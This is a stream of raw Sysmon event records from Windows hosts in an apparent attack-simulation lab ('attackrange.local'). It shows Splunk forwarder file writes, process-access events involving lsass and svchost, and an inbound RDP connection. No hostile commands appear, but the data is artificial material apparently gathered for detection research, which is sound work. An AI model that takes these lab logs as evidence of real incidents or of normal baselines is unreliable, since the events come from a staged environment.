Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F94886C50136E1C17A3D91CAF4A63E5F,SHA256=0C5D29D98309BE201DB03840DF5B3DB7D062FAD556E34C63DBCA222F9729A5E1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980741Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:21.770{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2EDDE719DBE839BDAA1BFA5797BEA44,SHA256=ABB2A0285F69AEDA117BD5DC68CC73859A4486520E4F18500C6AA4E4ABC3C474,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054943Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:22.740{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E3800352CA5D60C11649C4D2BE55698,SHA256=62226CEC1339D689A2C21DAD2532BE0866080B5998E5C2D38DAF85646D55CF02,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980743Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:22.770{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACA8E35095FBAC8A478F228F53DAD95C,SHA256=71F460DA21991CE4159DF50AC2C962E3C929A93E9B20FF030AE17C63530F6E30,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001054942Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:20.141{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54193-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000980742Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:18.814{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59511-false10.0.1.12-8000- 23542300x80000000000000001054944Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:23.767{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C3F81DE6019E80B9FB28242B372E74D,SHA256=DB872BDE8EC5179C53422912DAE3CDD80FF3332FBA4EEA3BCE1880EC869D37D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980744Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:23.771{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=027653D6A718F4E68397A88EC69422A7,SHA256=7D806A40C4ED0EE314A90CE64AB917AF4F2F4AAD74696FEDE286023C7FCA18CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054947Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:24.877{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDC7D640F234579CCE5070FDB7DDBC4C,SHA256=0A2463A3F7D040872BD7E458EEE5C71285AD31B125DA996DBC99B9D7844AF31F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054946Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:24.346{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CC1-6151-1D00-00000000FD01}1764C:\Windows\system32\compattelrunner.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054945Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:24.346{5EBD8912-8CBD-6151-0B00-00000000FD01}640764C:\Windows\system32\lsass.exe{5EBD8912-8CC1-6151-1D00-00000000FD01}1764C:\Windows\system32\compattelrunner.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054948Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:25.877{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7EA9B3CB2C0036CCCEF3ABE579FEB4E8,SHA256=7941B46C941715E55895B49BBC9E2351F6A223EC1EEF9A5E1FC32EFEBD530352,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980762Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.849{69CF5F33-8D15-6151-067A-00000000FD01}7561356C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980761Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.646{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D15-6151-067A-00000000FD01}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980760Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.646{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980759Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.646{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980758Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.646{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980757Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.646{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980756Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.646{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980755Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.646{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980754Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.631{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980753Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.631{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980752Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.631{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980751Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.631{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8D15-6151-067A-00000000FD01}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980750Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.631{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8D15-6151-067A-00000000FD01}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980749Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.631{69CF5F33-8D15-6151-067A-00000000FD01}756C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000980748Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:22.495{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59845-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000980747Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.242{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D162FA38AB33C2ACB9EB6E420E05CC20,SHA256=964910E35313C70A67C2B1278ACBC188C33D39B8C1E2B85A82EE1442923B7387,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980746Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.242{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EA35D3363454ECA009171C1F668CA424,SHA256=B2EF2525A90A5ABB4363B7CAF73806D92D7806B64EF1694F4BC0D9644D1CA60B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980745Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:25.005{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D22BEEA59CB260E8B491E20926610FB,SHA256=6B5CCAB080161BE6FA22807EA9BCD01F655816384CE32023440B0CEF7ACAB57F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054950Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:21:26.878{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4955C01A3F0462113A439DFDC9A9A6F,SHA256=211A183908585313083C07E90BF05AEE0211450A77C4675639E4DD5132C16329,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980778Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.662{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D162FA38AB33C2ACB9EB6E420E05CC20,SHA256=964910E35313C70A67C2B1278ACBC188C33D39B8C1E2B85A82EE1442923B7387,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980777Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.537{69CF5F33-8D16-6151-077A-00000000FD01}6841152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980776Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.333{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8D16-6151-077A-00000000FD01}684C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980775Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:21:26.333{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980774Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 